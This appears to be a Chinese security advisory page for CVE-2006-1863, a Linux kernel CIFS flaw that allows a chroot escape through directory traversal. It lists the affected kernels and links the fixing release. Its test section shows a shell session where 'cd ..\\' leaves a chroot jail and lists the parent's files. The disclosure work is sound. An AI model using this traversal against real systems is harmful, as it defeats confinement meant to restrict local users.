⊙　在线帮助 ⊙　添加收藏 ⊙　网站地图 最新资讯 技术中心 下载园地 漏洞总汇 在线书籍 X-档案 法规标准 技术论坛  您现在的位置 >> 首页 >> 漏洞总汇 >> 操作系统 >> Linux

Linux Kernel CIFS chroot目录遍历漏洞 【责 编】：AcOol 【作 者】：不详 【添 加】：2006-4-29 【更 新】：2006-4-29 【出 处】：绿盟科技 【字 体】：[ 小 大 ] 【浏 览】： 受影响系统：  Linux kernel < 2.6.16.11 不受影响系统：  Linux kernel 2.6.16.11 描述： BUGTRAQ  ID: 17742 CVE(CAN) ID: CVE-2006-1863 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel的CIFS加载文件系统中存在输入验证错误。本地攻击者可以利用“..\\”目录遍历序列绕过chroot限制，访问受限资源。 <*来源：Marcel Holtmann      链接：https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=189434         http://secunia.com/advisories/19868/print/ *> 测试： [root@server me]# pwd /path/to/my/dir [root@server me]# ls bin  chroot  etc  lib [root@server me]# chroot . bash-2.05a# pwd / bash-2.05a# ls bin  chroot  etc  lib bash-2.05a# cd ..\\ bash-2.05a# pwd /..\ bash-2.05a# ls <list of files from parent> 建议： 厂商补丁： Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： Linux linux-2.6.16.11.tar.bz2 http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.16.11.tar.bz2 ·本站特别声明不要转载或作者授权本站独家播发的文章，请勿转载。 ·本站原创文章可自由转载，但本站作者及本站链接必须保留。 ·非本站原创文章可自由转载，请按作者及文章出处一节，自行链接。 ·转载之图片、文件，链接请不要盗链到本站，且不准打上各自站点的水印，亦不能抹去我站点水印。

+ 本站推荐 + ·BlackICE文件锁定保护绕过漏洞 ·Apache mod_tcl远程格式串处理 ·phpBB Security phpbb_securit ·phpBB PlusXL phpbb_root_path ·phpBB Archive for Search Eng + 相关漏洞 + ·Linux Kernel ELF文件跨区域映 ·Linux Kernel USB驱动数据队列 ·Linux Kernel PROC文件系统本地 ·Linux Kernel PRCTL Core Dump ·PPPD Winbind插件本地权限提升 + 热点漏洞 + ·动网论坛(DVBBS 7.1.0 SP1)Sav ·Microsoft IE JavaScript OnLo ·Microsoft Windows Media Play ·RARLAB WinRAR命令行处理溢出漏 ·Symantec Antivirus 远程堆栈溢 + 本站发布 +

关于站点 | 免责申明 | 版权隐私 | 业务合作 | 提供捐助 | 联系我们 Copyright © 2001-2005 CoolerSky. All Rights Reserved.